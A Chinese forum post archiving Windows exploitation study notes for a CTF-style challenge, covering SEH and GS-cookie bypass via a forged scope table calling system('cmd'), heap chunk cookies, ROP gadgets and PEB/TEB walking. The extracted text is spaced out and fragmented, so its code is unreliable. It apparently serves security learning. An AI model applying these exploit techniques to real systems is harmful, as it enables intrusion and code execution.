搜索

[18261] 2021-01-16_windowspwn学习笔记(附wingame下载地址)

文档创建者:s7ckTeam
浏览次数:23
最后更新:2025-01-18
2021-01-16_windowspwn学习笔记(附wingame下载地址) w i n d o w s   p w n w i n g a m e s n o w l e o p a r d * * * *   H A C K   2 0 2 1 - 0 1 - 1 6 w i n p w n p i p   i n s t a l l   w i n p w n p i p   i n s t a l l   p e f i l e p i p   i n s t a l l   k e y s t o n e - e n g i n e p i p   i n s t a l l   c a p s t o n e 3 2 S E H / / s e h F r a m e   _ E H 3 _ E X C E P T I O N _ R E G I S T R A T I O N   s t r u c   ;   ( s i z e o f = 0 x 1 0 ,   a l i g n = 0 x 4 ,   c o p y o f _ 4 ) 0 x 0   N e x t                         d d   ?                                         ;   o f f s e t 0 x 4   E x c e p t i o n H a n d l e r   d d   ?                                       ;   o f f s e t 0 x 8   S c o p e T a b l e             d d   ?                                         ;   X R E F :   _ m a i n + 2 1 / w   ;   o f f s e t 0 x C   T r y L e v e l                 d d   ?                                         ;   X R E F :   _ m a i n + 5 7 / w 0 x 1 0   _ E H 3 _ E X C E P T I O N _ R E G I S T R A T I O N   e n d s / / s c o p e T a b l e _ E H 4 _ S C O P E T A B L E   s t r u c   ;   ( s i z e o f = 0 x 1 0 ,   a l i g n = 0 x 4 ,   c o p y o f _ 9 ,   v a r i a b l e   s i z e ) 0 x 0   G S C o o k i e O f f s e t     d d   ? 0 x 4   G S C o o k i e X O R O f f s e t   d d   ? 0 x 8   E H C o o k i e O f f s e t     d d   ? 0 x C   E H C o o k i e X O R O f f s e t   d d   ? 0 x 1 0   S c o p e R e c o r d           _ E H 4 _ S C O P E T A B L E _ R E C O R D   0   d u p ( ? ) 0 x 1 0   _ E H 4 _ S C O P E T A B L E   e n d s
/ / s c o p e T a b l e _ R e c o r d _ E H 4 _ S C O P E T A B L E _ R E C O R D   s t r u c   ;   ( s i z e o f = 0 x C ,   a l i g n = 0 x 4 ,   c o p y o f _ 8 ) 0 x 0   E n c l o s i n g L e v e l     d d   ? 0 x 4   F i l t e r F u n c             d d   ?                                         ;   o f f s e t 0 x 8   H a n d l e r F u n c           d d   ?                                         ;   o f f s e t 0 x C   _ E H 4 _ S C O P E T A B L E _ R E C O R D   e n d s G S   C o o k i e s   v o i d   _ _ c d e c l   V a l i d a t e L o c a l C o o k i e s ( v o i d   ( _ _ f a s t c a l l   * c o o k i e C h e c k F u n c t i o n ) ( u n s i g n e d   i n t ) ,   _ E H 4 _ S C O P E T A B L E   * s c o p e T a b l e ,   c h a r   * f r a m e P o i n t e r ) {         u n s i g n e d   i n t   v 3 ;   / /   e s i @ 2         u n s i g n e d   i n t   v 4 ;   / /   e s i @ 3         i f   (   s c o p e T a b l e - > G S C o o k i e O f f s e t   ! =   - 2   )         {                 v 3   =   * ( _ D W O R D   * ) & f r a m e P o i n t e r [ s c o p e T a b l e - > G S C o o k i e O f f s e t ]   ^   ( u n s i g n e d   i n t ) & f r a m e P o i n t e r [ s c o p e T a b l e - > G S C o o k i e X O R O f f s e t ] ;                 _ _ g u a r d _ c h e c k _ i c a l l _ f p t r ( c o o k i e C h e c k F u n c t i o n ) ;                 ( ( v o i d   ( _ _ t h i s c a l l   * ) ( _ D W O R D ) ) c o o k i e C h e c k F u n c t i o n ) ( v 3 ) ;         }         v 4   =   * ( _ D W O R D   * ) & f r a m e P o i n t e r [ s c o p e T a b l e - > E H C o o k i e O f f s e t ]   ^   ( u n s i g n e d   i n t ) & f r a m e P o i n t e r [ s c o p e T a b l e - > E H C o o k i e X O R O f f s e t ] ;         _ _ g u a r d _ c h e c k _ i c a l l _ f p t r ( c o o k i e C h e c k F u n c t i o n ) ;         ( ( v o i d   ( _ _ t h i s c a l l   * ) ( _ D W O R D ) ) c o o k i e C h e c k F u n c t i o n ) ( v 4 ) ; }
1 f r a m e P o i n t e r [ s c o p e T a b l e - > G S C o o k i e O f f s e t ]   ^   f r a m e P o i n t e r [ s c o p e T a b l e - > G S C o o k i e X O R O f f s e t ] = =   _ _ s e c u r i t y _ c o o k i e 2 f r a m e P o i n t e r [ s c o p e T a b l e - > E H C o o k i e O f f s e t ]   ^   f r a m e P o i n t e r [ s c o p e T a b l e - > E H C o o k i e X O R O f f s e t ] = =   _ _ s e c u r i t y _ c o o k i e 1 2 i n t   _ _ c d e c l   _ e x c e p t _ h a n d l e r 4 _ c o m m o n ( u n s i g n e d   i n t   * s e c u r i t y C o o k i e s ,   v o i d   ( _ _ f a s t c a l l   * c o o k i e C h e c k F u n c t i o n ) ( u n s i g n e d   i n t ) ,   _ E X C E P T I O N _ R E C O R D   * e x c e p t i o n R e c o r d ,   u n s i g n e d   _ _ i n t 3 2   s e h F r a m e ,   _ C O N T E X T   * c o n t e x t ) {         / /     s c o p e   t a b l e         s c o p e T a b l e _ 1   =   ( _ E H 4 _ S C O P E T A B L E   * ) ( * s e c u r i t y C o o k i e s   ^   * ( _ D W O R D   * ) ( s e h F r a m e   +   8 ) ) ;         / /   s e h F r a m e = N e x t ,   f r a m e P o i n t e r = e b p         f r a m e P o i n t e r   =   ( c h a r   * ) ( s e h F r a m e   +   1 6 ) ;         s c o p e T a b l e   =   s c o p e T a b l e _ 1 ;         / /     G S         V a l i d a t e L o c a l C o o k i e s ( c o o k i e C h e c k F u n c t i o n ,   s c o p e T a b l e _ 1 ,   ( c h a r   * ) ( s e h F r a m e   +   1 6 ) ) ;         _ _ e x c e p t _ v a l i d a t e _ c o n t e x t _ r e c o r d ( c o n t e x t ) ;         i f   (   e x c e p t i o n R e c o r d - > E x c e p t i o n F l a g s   &   0 x 6 6   )         {                 . . . . . .         }         e l s e         {                 e x c e p t i o n P o i n t e r s . E x c e p t i o n R e c o r d   =   e x c e p t i o n R e c o r d ;                 e x c e p t i o n P o i n t e r s . C o n t e x t R e c o r d   =   c o n t e x t ;                 t r y L e v e l   =   * ( _ D W O R D   * ) ( s e h F r a m e   +   1 2 ) ;                 * ( _ D W O R D   * ) ( s e h F r a m e   -   4 )   =   & e x c e p t i o n P o i n t e r s ; s c o p e T a b l e - > G S C o o k i e O f f s e t = 0 x f f f f f f f e
                i f   (   t r y L e v e l   ! =   - 2   )                 {                         w h i l e   (   1   )                         {                                 v 8   =   t r y L e v e l   +   2   *   ( t r y L e v e l   +   2 ) ;                                 f i l t e r F u n c   =   ( i n t   ( _ _ f a s t c a l l   * ) ( _ D W O R D ,   _ D W O R D ) ) * ( & s c o p e T a b l e _ 1 - > G S C o o k i e X O R O f f s e t   +   v 8 ) ;                                 s c o p e T a b l e R e c o r d   =   ( _ E H 4 _ S C O P E T A B L E _ R E C O R D   * ) ( ( c h a r   * ) s c o p e T a b l e _ 1   +   4   *   v 8 ) ;                                 e n c l o s e i n g L e v e l   =   s c o p e T a b l e R e c o r d - > E n c l o s i n g L e v e l ; / / - 2                                 s c o p e T a b l e R e c o r d _ 1   =   s c o p e T a b l e R e c o r d ;                                 i f   (   f i l t e r F u n c   )                                 {                                         / /     F i l t e r F u n c                                         f i l t e r F u n c R e t   =   _ E H 4 _ C a l l F i l t e r F u n c ( f i l t e r F u n c ) ;                                         . . . . . .                                         i f   (   f i l t e r F u n c R e t   >   0   )                                         {                                                 . . . . . .                                                 / /     H a n d l e r F u n c                                                 _ E H 4 _ T r a n s f e r T o H a n d l e r ( s c o p e T a b l e R e c o r d _ 1 - > H a n d l e r F u n c ,   v 5   +   1 6 ) ;                                                 . . . . . .                                         }                                 }                                 . . . . . .                                 t r y L e v e l   =   e n c l o s e i n g L e v e l ;                                 i f   (   e n c l o s e i n g L e v e l   = =   - 2   )                                         b r e a k ;                                 s c o p e T a b l e _ 1   =   s c o p e T a b l e ;                         }                         . . . . . .                 }         }     . . . . . . } f i l t e r F u n c s c o p e T a b l e s e h F r a m e s e c u r i t y C o o k i e s
p a y l o a d # s c o p e T a b l e s c o p e T a b l e   =   [         0 x 0 F F F F F F F E ,         # G S C o o k i e O f f s e t         0 ,                             # G S C o o k i e X O R O f f s e t         0 x 0 F F F F F F C C ,         # E H C o o k i e O f f s e t         0                               # E H C o o k i e X O R O f f s e t ] s c o p e T a b l e _ R e c o r d   =   [         0 x f f f f f f f e ,           # E n c l o s i n g L e v e l = - 2         s y s t e m ( ' c m d ' ) ,     # F i l t e r F u n c           0 ] s e h F r a m e   =   [         N e x t ,                               # o r i g i n a l         E x c e p t i o n H a n d l e r ,       # o r i g i n a l         s c o p e T a b l e _ a d d r ,         # f a k e         t r y l e v e l                         # t r y l e v e l s c o p e T a b l e o r i g i n a l ] p a y l o a d   =     f l a t ( s c o p e T a b l e   +   s c o p e T a b l e _ R e c o r d ) p a y l o a d   + =   p a d d i n g p a y l a o d   + =   G S # _ _ _ s e c u r i t y _ c o o k i e   c a n a r y p a y l o a d   + =   N e x t   +   E x c e p t i o n H a n d l e r   + s c o p e T a b l e _ a d d r   +   f l a t ( s e h F r a m e ) # s e h F r a m e G S s c o p e T a b l e E H C o o k i e O f f s e t E H C o o k i e X O R O f f s e t e b p G S E H C o o k i e X O R O f f s e t 0 G S e b p   +   s c o p e T a b l e - > E H C o o k i e O f f s e t 6 4 3 2 1 w i n d o w s   6 4 r c x , r d x , r 8 , r 9 2 s y s t e m ( c m d . e x e ) s h e l l M O V A P S 1 6 r o p g a d g e t [ e b p   +   s c o p e T a b l e - > E H C o o k i e O f f s e t ]   ^   [ e b p   +   s c o p e T a b l e - > E H C o o k i e X O R O f f s e t ] = G S M O V A P S   [ r s p + 0 x 4 f 0 ] , x m m 0
3 2 c h u n k S m a l l T a g I n d e x   c o o k i e H e a p   E n t r y L i n u x c h u n k w i n d o w s 8 H E A P 0 x 5 0 8 2 0 2 0 w i n g a m e n t d l l ! _ H E A P _ F R E E _ E N T R Y + 0     S i z e                                         # c h u n k S i z e * 8 + 2     P r e v i o u s S i z e                         # c h u n k * 8 + 4     S m a l l T a g I n d e x                       # C o o k i e + 5     F l a g s                                       # + 6     U n u s e d B y t e s                           # + 7     S e g m e n t I n d e x                         # + 8     F r e e L i s t         : [ F D - B K ] F l a g s 0 x 0 1   B u s y                               # 0 x 0 2   E x t r a   p r e s e n t             # 0 x 0 4   F i l l   p a t t e r n               # 使 0 x 0 8   V i r t u a l   A l l o c             # 0 x 1 0   L a s t   e n t r y                   # _ H E A P . _ H E A P _ E N T R Y . c o o k i e = _ H E A P _ E N T R Y . c o o k i e ^ ( ( B Y T E ) & _ H E A P _ E N T R Y / 8 )
0 x E 5 0 0 0 0 H E A P H E A P + 0 x 5 0 0 0 0 C 5 F B B 3 E F E 5 6 0 0
c h u n k 8 s i z e = 0 x 2 1 * 8 = 0 x 1 0 8 1 R O P n t d l l   - >   n t d l l ! P e b L d r p e b   - > t e b   - >     - > r e t r e t _ c o n t e n t   =   b a s e   +   0 x 2 3 9 a r e t _ a d d r   =   0 f o r   i   i n   r a n g e ( s t a c k b a s e , s t a c k b a s e - 0 x 1 0 0 0 , - 4 ) :         i f   r e t _ a d d r = = 0 :                 t m p   =   r e ( i )                 i f   t m p = = r e t _ c o n t e n t :                         r e t _ a d d r   =   i                         b r e a k a s s e r t   r e t _ a d d r > 0 g a d g e t   :   m o v   [ r c x ] , r d x ;   r e t g a d g e t n t d l l . d l l r o p i d a p e b 2 1 0 0 0 1 2 0   0 1 0 2 0 0 0 8 p o p   r c x ; r e t p o p   r d x ; r e t
线 w i n d b g p d b 使 x 6 4 d b g 1 i d a n t d l l L d r Q u e r y I m a g e F i l e E x e c u t i o n O p t i o n s 2 . d a t a p e b _ 4 4 . d a t a 3 p e b _ 4 4 n t d l l + 0 x 1 1 d c 5 4 w i n 1 0   1 8 3 6 3 3 2 n t d l l 4 n t d l l + 0 x 1 1 d c 5 4 p e b + 0 x 4 4 p e b
N T f s T E B T E B + 0 x 3 0 P E B P E B + 0 x 0 c P E B _ L D R _ D A T A P E B _ L D R _ D A T A + 0 x 1 c w i n 7 n t d l . d l l k e r n e l 3 2 . d l l 线 T E B + 0 x 3 0 P E B P E B + 0 x c n t d l l 5 P E B - > T E B - > s t a c k P E B T E B T E B = P E B + 0 x 3 0 0 0 T E B e b p S E H _ R E C O D E [ 1 ] s t a c k   b a s e s t a c k   e n d s t a c k   b a s e - 0 x 1 0 0 0 s t a c k   b a s e k e r n e l 3 2 . d l l n t d l l n t d l l k e r n e l 3 2 . d l l h t t p s : / / x z . a l i y u n . c o m / t / 6 3 1 9 # t o c - 4   k e r n e l 3 2 . d l l N t C r e a t e F i l e N t C r e a t e F i l e n t d l l . d l l w i n 1 0   1 8 3 6 3 k e r n e l 3 2 . d l l + 0 x 8 1 9 B C d l l d l l d l l 2 P E B P E B R t l E n t e r C r i t i c a l S e c t i o n ( ) R t l L e a v e C r i t i c a l S e c t i o n ( ) 退 E x i t P r o c e s s ( ) 线 R t l E n t e r C r i t i c a l S e c t i o n ( ) R t l L e a c e C r i t i c a l S e c t i o n ( ) / / 3 2 R t l E n t e r C r i t i c a l S e c t i o n   =   & P E B   +   0 x 2 0 ; R t l L e a v e C r i t i c a l S e c t i o n   =   & P E B   +   0 x 2 4 ; 3 U E F U E F U n h a n d l e r   E x c e p t i o n   F i l t e r s h e l l c o d e U E F S e t U n h a n d l e d E x c e p t i o n F i l t e r ( ) U n h a n d l e d E x c e p t i o n F i l t e r M O V 7 7 E 9 3 1 1 4       A 1   B 4 7 3 E D 7 7             M O V   E A X , D W O R D   P T R   D S : [ 7 7 E D 7 3 B 4 ]     ; U n h a n d l e d E x c e p t i o n F i l t e r 7 7 E 9 3 1 1 9       3 B C 6                           C M P   E A X , E S I 7 7 E 9 3 1 1 B       7 4   1 5                         J E   S H O R T   k e r n e l 3 2 . 7 7 E 9 3 1 3 2 7 7 E 9 3 1 1 D       5 7                               P U S H   E D I 7 7 E 9 3 1 1 E       F F D 0                           C A L L   E A X
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理